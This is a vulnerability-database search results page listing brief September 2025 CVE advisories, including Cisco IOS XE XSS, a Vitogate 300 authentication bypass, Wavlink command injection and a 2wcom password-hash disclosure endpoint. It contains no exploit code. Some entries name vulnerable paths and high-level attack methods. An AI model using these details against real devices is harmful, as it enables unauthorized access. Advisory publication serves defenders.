Lucene search
K

16820 matches found

Tenable Nessus
Tenable Nessus
added 2025/09/26 12:0 a.m.2 views

File Browser Unauthenticated Access

File Browser is an open-source web-based file manager that allows users to manage files on a server through a web interface. If the File Browser instance is accessible without authentication, it can lead to unauthorized access to sensitive files and directories on the server. No source data...

6.8AI score
Exploits0References2
Vulnrichment
Vulnrichment
added 2025/09/25 5:32 p.m.3 views

CVE-2025-10959 Wavlink NU516U1 firewall.cgi sub_401778 command injection

A vulnerability has been found in Wavlink NU516U1 M16U1V240425. The affected element is the function sub401778 of the file /cgi-bin/firewall.cgi. Such manipulation of the argument dmzflag leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public...

6.5CVSS6.6AI score0.0661EPSS
Exploits1References5
RedhatCVE
RedhatCVE
added 2025/09/25 2:53 a.m.5 views

CVE-2025-9495

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

8.7CVSS7AI score0.00292EPSS
Exploits0References1
CNNVD
CNNVD
added 2025/09/25 12:0 a.m.3 views

IBM Watson Studio 跨站脚本漏洞

IBM Watson Studio is a data science and machine learning platform from IBM, integrated into Cloud Pak for Data, for building, training and deploying AI models. A cross-site scripting vulnerability exists in IBM Watson Studio versions 4.0 through 5.2.0 that stems from not adequately filtering user...

5.4CVSS6.2AI score0.00162EPSS
Exploits0References1
NVD
NVD
added 2025/09/24 6:15 p.m.12 views

CVE-2025-20327

A vulnerability in the web UI of Cisco IOS Software could allow an authenticated, remote attacker with low privileges to cause a denial of service DoS condition on an affected device. This vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a...

7.7CVSS0.00354EPSS
Exploits0References1
NVD
NVD
added 2025/09/24 6:15 p.m.6 views

CVE-2025-20240

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting attack XSS on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

6.1CVSS0.00272EPSS
Exploits0References1
Cvelist
Cvelist
added 2025/09/24 5:14 p.m.6 views

CVE-2025-20240

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting attack XSS on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

6.1CVSS0.00272EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2025/09/24 5:14 p.m.1 views

CVE-2025-20240

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting attack XSS on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

6.1CVSS5.2AI score0.00272EPSS
Exploits0References1
CVE
CVE
added 2025/09/24 5:14 p.m.24 views

CVE-2025-20240

Cisco IOS XE Software Web UI/Web Authentication vulnerability (CVE-2025-20240) is a reflected XSS due to improper sanitization of user input. An unauthenticated, remote attacker can bait a user to click a malicious link, potentially executing a reflected XSS and stealing cookies on the affected d...

6.1CVSS5.2AI score0.00272EPSS
Exploits0References1
Cvelist
Cvelist
added 2025/09/24 5:11 p.m.7 views

CVE-2025-20327

A vulnerability in the web UI of Cisco IOS Software could allow an authenticated, remote attacker with low privileges to cause a denial of service DoS condition on an affected device. This vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a...

7.7CVSS0.00354EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2025/09/24 5:11 p.m.1 views

CVE-2025-20327

A vulnerability in the web UI of Cisco IOS Software could allow an authenticated, remote attacker with low privileges to cause a denial of service DoS condition on an affected device. This vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a...

7.7CVSS6.3AI score0.00354EPSS
Exploits0References1
Cisco
Cisco
added 2025/09/24 4:0 p.m.11 views

Cisco IOS XE Software Web Authentication Reflected Cross-Site Scripting Vulnerability

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting attack XSS on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

6.1CVSS5.7AI score0.00272EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2025/09/24 12:28 a.m.10 views

CVE-2025-57433

The 2wcom IP-4c 2.15.5 device's web interface includes an information disclosure vulnerability. By sending a crafted POST request to a specific endpoint /cwi/ajaxrequest/getdata.php, an authenticated attacker even with a low-privileged account like guest can retrieve the hashed passwords for the...

6.5CVSS6.2AI score0.00337EPSS
Exploits1References1
IBM Security Bulletins
IBM Security Bulletins
added 2025/09/23 8:54 p.m.9 views

Security Bulletin: TS4500 Tape Library/Diamondback Tape Library addresses security vulnerability CVE-2025-36088

Summary The web GUI did not sufficiently sanitize user input in certain dialogs, allowing HTML or JavaScript to be stored and later displayed to other users. Malicious code would only execute if a user opened the affected event entry. The issue has been resolved by adding proper input sanitizatio...

5.4CVSS6AI score0.00166EPSS
Exploits0Affected Software2
NVD
NVD
added 2025/09/23 2:15 a.m.5 views

CVE-2025-9495

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

8.7CVSS0.00292EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2025/09/23 1:16 a.m.1 views

CVE-2025-9495 Viessmann Vitogate 300 Authentication Bypass

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

8.7CVSS6.6AI score0.00292EPSS
Exploits0References1
Cvelist
Cvelist
added 2025/09/23 1:16 a.m.6 views

CVE-2025-9495 Viessmann Vitogate 300 Authentication Bypass

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

8.7CVSS0.00292EPSS
Exploits0References1
CVE
CVE
added 2025/09/23 1:16 a.m.13 views

CVE-2025-9495

CVE-2025-9495 - Vitogate 300 Authentication Bypass : The Vitogate 300 web interface relies on frontend-based authentication controls and does not enforce proper server-side authentication. An attacker can modify HTML elements via browser developer tools to bypass login restrictions and reveal the...

8.7CVSS6.6AI score0.00292EPSS
Exploits0References1
CVE
CVE
added 2025/09/22 12:0 a.m.14 views

CVE-2025-57433

The CVE-2025-57433 entry concerns the 2wcom IP-4c device (version 2.15.5). A vulnerability in the web interface allows information disclosure via a crafted POST to /cwi/ajax_request/get_data.php. An authenticated user, even with low privileges (e.g., guest), can retrieve hashed passwords for admi...

6.5CVSS5.8AI score0.00337EPSS
Exploits1References2Affected Software1
Cvelist
Cvelist
added 2025/09/22 12:0 a.m.7 views

CVE-2025-57433

The 2wcom IP-4c 2.15.5 device's web interface includes an information disclosure vulnerability. By sending a crafted POST request to a specific endpoint /cwi/ajaxrequest/getdata.php, an authenticated attacker even with a low-privileged account like guest can retrieve the hashed passwords for the...

0.00337EPSS
Exploits1References2
Rows per page
Query Builder